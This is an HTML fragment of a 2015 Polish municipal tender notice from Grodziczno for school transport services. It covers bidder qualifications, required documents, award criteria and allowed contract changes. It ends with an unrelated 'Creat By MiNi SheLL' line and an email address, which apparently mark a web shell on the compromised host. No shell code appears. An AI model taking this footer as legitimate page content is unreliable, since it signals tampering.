Opiekun (osoba opiekująca się uczniami na czas przewozu) musi posiadać kwalifikacje pedagogiczne i przeszkolenie z zakresu pierwszej pomocy przedmedycznej. 
Zamawiający nie wymaga opiekuna dla części nr 6 przedmiotu zamówienia.
Spełnienie tego warunku nastąpi poprzez złożenie oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy  
2)Oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych
3)Oświadczenia o braku podstaw do wykluczenia z postępowania o udzielenia zamówienia z art. 24 ust. 1  ustawy z dnia 29.01.2004r. Prawo zamówień publicznych
4)Wykazu niezbędnego do wykonania zamówienia taboru komunikacyjnego
5)Zobowiązanie podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia - jeżeli dotyczy
6)Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
7)Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy, tj. w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331 z późn. zm.) albo informację, o tym, że wykonawca nie należy do grupy kapitałowej.
8)Odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych,
9)Dokument potwierdzający ustanowienie pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego w przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia,
10)Pełnomocnictwo do podpisania oferty  w przypadku, gdy ofertę podpisuje osoba, która nie jest wskazana we właściwym rejestrze lub ewidencji działalności gospodarczej do reprezentacji podmiotu o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą,
11)Inne dokumenty i oświadczenia, o których mowa w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas podstawienia zastępczego pojazdu w przypadku awarii środka transportu - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, obejmujących 
1)Zmiany terminu realizacji przedmiotu zamówienia:
2)dla zmiany sposobu spełnienia świadczenia:
a) wystąpienia w trakcie realizacji zamówienia nieprzewidzianych okoliczności powodujących, że wykonanie zamówienia będzie niemożliwe do wykonania zgodnie z ustalonymi trasami i kilometrami,
b) wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia, niezależnych od Wykonawcy,
c) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia,
proponowanych przez jedną ze stron - jeżeli zmiany te są korzystne dla Zamawiającego,
d) zmian ilościowych dzieci skutkujących zmianami w ilości dowożonych uczniów,
zmian uzależnionych od zmiany planów lekcji, ilości dzieci, zmiany organizacji roku szkolonego, odpracowywania dni wolnych, skrócenia godzin nauki etc.
e) konieczności likwidacji, skrócenia lub wydłużenia każdej z tras w poszczególnych częściach przedmiotu zamówienia spowodowanej zmianami ilościowymi dowożonych uczniów,
f) konieczności wprowadzenia dodatkowych przystanków na każdej z tras w poszczególnych częściach przedmiotu zamówienia spowodowanej zmianami ilościowymi dowożonych uczniów.
3)Dla zmian  personalnych, w szczególności:
a)zmiana osób, przy pomocy których wykonawca realizuje przedmiot umowy, na inne, legitymujące się co najmniej równoważnymi uprawnieniami. Zamawiający, nie dopuszcza do zmiany personelu na osoby o niższych kwalifikacjach lub doświadczeniu, niż wykazano w warunkach;
b)zmiana podwykonawcy, przy pomocy którego wykonawca wykonuje przedmiot umowy, na innego.
4)Dla pozostałych zmian:
a)zmiana obowiązującej stawki VAT;
b)rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami;
c)zmiany uzasadnione okolicznościami, o których mowa w art. 3571 KC z uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 KSH;
d)zmiana podwykonawcy, przy pomocy którego wykonawca wykonuje przedmiot umowy, 
e)inne zmiany, które spowodują ingerencję w określenie przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.grodziczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy; Grodziczno 17A;13 - 324 Grodziczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2015 godzina 08:30, miejsce: w siedzibie Urzędu Gminy; Grodziczno 17A;13 - 324 Grodziczno  - Sekretariat pokój 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com